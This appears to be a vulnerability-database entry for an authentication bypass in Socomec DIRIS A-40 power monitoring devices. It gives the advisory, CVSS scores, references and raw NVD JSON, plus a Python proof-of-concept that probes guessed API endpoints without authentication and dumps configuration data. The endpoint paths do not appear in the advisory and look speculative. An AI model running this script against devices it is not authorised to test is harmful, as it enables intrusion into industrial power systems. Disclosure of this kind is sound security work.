CVE-2026-2491

Description

Socomec DIRIS A-40 HTTP API Authentication Bypass Vulnerability. This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of Socomec DIRIS A-40 power monitoring devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web API implementation, which listens on TCP port 80 by default. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-23993.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Socomec DIRIS A-40 (固件版本未明确)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-2491 PoC - Socomec DIRIS A-40 Authentication Bypass
# Target: Socomec DIRIS A-40 HTTP API (TCP Port 80)
# Attack Vector: Adjacent Network
# Authentication Required: None

import requests
import sys

def check_vulnerability(target_ip):
    """
    Check if target is vulnerable to CVE-2026-2491
    """
    target_url = f"http://{target_ip}/api/"
    
    # Try to access API endpoints without authentication
    endpoints = [
        "/api/config",
        "/api/status",
        "/api/system",
        "/api/users",
        "/api/settings"
    ]
    
    print(f"[*] Testing CVE-2026-2491 on {target_ip}")
    print(f"[*] Target URL: {target_url}")
    
    for endpoint in endpoints:
        try:
            url = target_url + endpoint.lstrip('/')
            response = requests.get(url, timeout=10)
            
            if response.status_code == 200:
                print(f"[+] VULNERABLE: {endpoint} accessible without auth")
                print(f"    Status Code: {response.status_code}")
                print(f"    Response Length: {len(response.text)} bytes")
            elif response.status_code == 401:
                print(f"[-] Protected: {endpoint} requires auth")
            else:
                print(f"[*] Endpoint {endpoint} returned: {response.status_code}")
                
        except requests.exceptions.RequestException as e:
            print(f"[!] Error connecting to {endpoint}: {e}")
    
    return True

def exploit_config_access(target_ip):
    """
    Exploit: Access sensitive configuration without authentication
    """
    config_url = f"http://{target_ip}/api/config"
    
    try:
        response = requests.get(config_url, timeout=10)
        if response.status_code == 200:
            print(f"[+] Successfully accessed configuration data")
            print(f"[+] Response:")
            print(response.text[:500])
            return response.json()
    except Exception as e:
        print(f"[!] Exploit failed: {e}")
    
    return None

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2026-2491.py <target_ip>")
        sys.exit(1)
    
    target = sys.argv[1]
    check_vulnerability(target)
    exploit_config_access(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-2491
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-2491
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-2491/
[4] VulDB https://vuldb.com/cve/CVE-2026-2491
[5] https://emea.socomec.com/en/resource-center/resource-type/cyber-vulnerabilities-601
[6] https://www.zerodayinitiative.com/advisories/ZDI-26-129/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-2491", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:30.543", "lastModified": "2026-03-16T14:53:07.390", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Socomec DIRIS A-40 HTTP API Authentication Bypass Vulnerability. This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of Socomec DIRIS A-40 power monitoring devices. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the web API implementation, which listens on TCP port 80 by default. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-23993."}, {"lang": "es", "value": "Vulnerabilidad de omisión de autenticación de la API HTTP de Socomec DIRIS A-40. Esta vulnerabilidad permite a atacantes adyacentes a la red omitir la autenticación en instalaciones afectadas de dispositivos de monitoreo de energía Socomec DIRIS A-40. La autenticación no es necesaria para explotar esta vulnerabilidad.\n\nLa falla específica existe dentro de la implementación de la API web, que escucha en el puerto TCP 80 por defecto. El problema resulta de la falta de autenticación antes de permitir el acceso a la funcionalidad. Un atacante puede aprovechar esta vulnerabilidad para omitir la autenticación en el sistema. Fue ZDI-CAN-23993."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://emea.socomec.com/en/resource-center/resource-type/cyber-vulnerabilities-601", "source": "[email protected]"}, {"url": "https://www.zerodayinitiative.com/advisories/ZDI-26-129/", "source": "[email protected]"}]}}